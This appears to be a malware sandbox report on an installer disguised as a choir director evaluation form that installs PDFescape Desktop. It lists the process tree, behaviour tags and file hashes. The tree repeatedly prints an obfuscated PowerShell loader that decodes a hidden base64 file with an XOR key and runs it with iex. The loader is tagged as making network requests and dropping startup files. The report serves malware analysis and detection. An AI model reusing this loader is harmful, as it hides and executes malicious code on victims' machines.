C:\Users\Admin\AppData\Local\Temp\is-8E9RG.tmp\Choir-Director-Evaluation-Form.tmp"C:\Users\Admin\AppData\Local\Temp\is-8E9RG.tmp\Choir-Director-Evaluation-Form.tmp" /SL5="$2011A,111934780,999424,C:\Users\Admin\AppData\Local\Temp\Choir-Director-Evaluation-Form.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-6P3E1.tmp\PDFescape_Desktop_Installer.exe"C:\Users\Admin\AppData\Local\Temp\is-6P3E1.tmp\PDFescape_Desktop_Installer.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe /s "C:\ProgramData\PDFescape Desktop\Installation\Statistics.dll"4⤵
- Loads dropped DLL
- Modifies registry class
-
C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe"C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe" /RegServer4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$e9e4ddb1f3df7d34e8dfbcb832e3f3fc='C:\Users\Admin\0816c0c5f2fe2943dbdf075899531258\c0ec063610a26b9bf06cdf7cf9501298\12331d2c2acf4e4c1d63a0c13b349dee\c1a1dda7d4f952966ac0cfc3aeb38767\b501b3797ce826399d5d5e65f4d5c20c\8552f124ebd49ad34c4123b714ed41e9\b3158b8175241aa9ab2c13d7384ed16a';$9920df3c874536b25161629cb2e4ef6b='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($e9e4ddb1f3df7d34e8dfbcb832e3f3fc));remove-item $e9e4ddb1f3df7d34e8dfbcb832e3f3fc;for($i=0;$i -lt $551c940ba5a1f72b0b10cc3abcd7f33d.count;){for($j=0;$j -lt $9920df3c874536b25161629cb2e4ef6b.length;$j++){$551c940ba5a1f72b0b10cc3abcd7f33d[$i]=$551c940ba5a1f72b0b10cc3abcd7f33d[$i] -bxor $9920df3c874536b25161629cb2e4ef6b[$j];$i++;if($i -ge $551c940ba5a1f72b0b10cc3abcd7f33d.count){$j=$9920df3c874536b25161629cb2e4ef6b.length}}};$551c940ba5a1f72b0b10cc3abcd7f33d=[System.Text.Encoding]::UTF8.GetString($551c940ba5a1f72b0b10cc3abcd7f33d);iex $551c940ba5a1f72b0b10cc3abcd7f33d;"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{2BC47158-F746-4E22-B116-D481B09E9674}1⤵
- Loads dropped DLL
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\preview-handler.dll"2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\thumbnail-handler.dll"2⤵
- Loads dropped DLL
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\context-menu.dll"2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exe"C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dll"2⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Program Files\PDFescape Desktop\ws.exe"C:\Program Files\PDFescape Desktop\ws.exe" -service2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding EC4E8D2538A7BD806215B7051BED98E4 E Global\MSI00002⤵
- Loads dropped DLL
-
C:\Program Files\PDFescape Desktop\updater-ws.exe"C:\Program Files\PDFescape Desktop\updater-ws.exe" -service2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll"2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll"2⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-word-plugin.dll"2⤵
- Loads dropped DLL
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-excel-plugin.dll"2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\System32\MsiExec.exe"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-powerpoint-plugin.dll"2⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\syswow64\MsiExec.exe"C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll"2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exe"C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll"2⤵
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Program Files\PDFescape Desktop\creator\common\printer-installer-app.exe"C:\Program Files\PDFescape Desktop\creator\common\printer-installer-app.exe" -i "C:\Program Files\PDFescape Desktop\creator\common"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Program Files\PDFescape Desktop\creator\common\creator-app.exe"C:\Program Files\PDFescape Desktop\creator\common\creator-app.exe" -regserver2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe"C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe" -service2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Program Files\PDFescape Desktop\escape.exe"C:\Program Files\PDFescape Desktop\escape.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\PDFescape Desktop\escape.exe"C:\Program Files\PDFescape Desktop\escape.exe" --update --update-silent2⤵
- Executes dropped EXE
-
C:\Program Files\PDFescape Desktop\ws.exe"C:\Program Files\PDFescape Desktop\ws.exe"1⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Program Files\PDFescape Desktop\updater-ws.exe"C:\Program Files\PDFescape Desktop\updater-ws.exe"1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dllMD5
a733c1f89219252497e94cbc66272478
SHA1f5f9be9a2345f6dc0414c3b62b4087faa32ce351
SHA256557bb1a545eac9c352dbbe15fbf383d29c6b2640b8cf74e49fefcdee97270547
SHA512875b4958cadbd8901f4fcb6c5c12f24e2112dbd287975134c6f83573d6ce679be0058dc259ab1db31a64dc48470622c80e75555e43a240e63854df859b65e0bd
-
C:\Program Files\PDFescape Desktop\atom.dllMD5
9148f07e6dedce3e8e6a642fba0402d8
SHA12e403f6b65bf4519d0883ebb0025d77130105a1c
SHA25635bd82d881759b2aa8ef6dc6e26d0943a19593b2192d207b4440c6e1a29ba05a
SHA5128f7ab028af2b782df35bf9940a8f367ac49f015d8302242d553e9437882b1fb76ebc91f3dfe2faadd2cde07af260e8ad140e3a59f0f44c05188ebf2bcfe016cb
-
C:\Program Files\PDFescape Desktop\brand.dllMD5
594a3e3adcf139e7b20eddd1f16131d3
SHA17700c89b10e779fc6db72b42be0a81fe89378f9a
SHA25652163973b0cf8d46bcd1fb26c58f8ab2f7b31fb7e2b05ded2b59ae8d4e2332ad
SHA512d1240865fc5bfcd0c17205ce866be49b76ae31fccaaa724859822a6311e0e5bb6df2642b5659c1ad20414d79c6c9abbe74419ad4474fa71cbc4e8cab57d0c7cc
-
C:\Program Files\PDFescape Desktop\context-menu.dllMD5
2c9f26866787b200996d99ad160be2b2
SHA1fec80f5b4a6acf29f74a2bc8918298518a487597
SHA2564e3a2ed474ffdb02b4a177cd748cdb31b63f1f1fe3c32bf64cedfc06b6528a57
SHA5129ade4951f2297ad233bbd41103c8a686a6098cdb2f88ad63eec8742e3bacb85fc02357a58163139259274ed6f3a1299d07b7b7db43bf8eb539c1e0fec018d6dd
-
C:\Program Files\PDFescape Desktop\encoding-conversion.dllMD5
448a6de619faf0f403c897b142f619c5
SHA1e76953f8ee3c207b44d2e7c92eaabd5e6deee4d2
SHA25600a91d382e5e4a04071b208e4717c0f53e7d7146db1ab542f3fb3358f8aa4c51
SHA512f4e450e63a7105796fe78d90731c62804cf2ee5d2ac706525684b5c4eb20552126d1a2393acb5d5b4ee59ca4a4429aab9403510aa7947b2ef6f3eb36cbd3348d
-
C:\Program Files\PDFescape Desktop\libcurl.dllMD5
140cdda2f51d89dc194a8b8c3ab9e463
SHA1255180975a70d00d31d516ecc895e42fd18c24bf
SHA256a30c086bb16c702985df2193d1e52cfb15b978a679de014b449a95eb9a233c15
SHA5125065efa34b3289be247a5bc3f677afae7a86753fc37f816da70d54d1986b6dfe8cc73ad13900020a99fec7de71bd4d23e02bf73fab6be220db1c65482ca860a4
-
C:\Program Files\PDFescape Desktop\libssl-1_1-x64.dllMD5
62dc606e7f85f8f15a582a045e394d19
SHA1bad647ebb9207e2b20d464c6b420c84b971519d2
SHA2567a91d83167c864b5381667370b95fe6081290c61356c90def9a25cf7b3d9c411
SHA512d7e8c1e9abf695db2b1038c5231ccbc3c2cfd89171e4df3d7a13d8979c096772feace7dacbbb347a657e4e5519240813f8953b75c80259cd256245a9ef2f7e8f
-
C:\Program Files\PDFescape Desktop\pdfcore.dllMD5
c10d1adf13c2edde02e6adf49d1c900b
SHA14455fc9f229dedf4dd5622e6675c7a03ac8bd4d6
SHA2566e028640b313e136a28c77245700a5b2a604935fc55f4454888192b685081d44
SHA5120768d3372e652282d3cd0e5fa9e697949d682fa4e3c9ee8d70461588baa07243271129ec5b300c1893820fddaafda12867605c1c5858d57efa9e3fd65ca28fbe
-
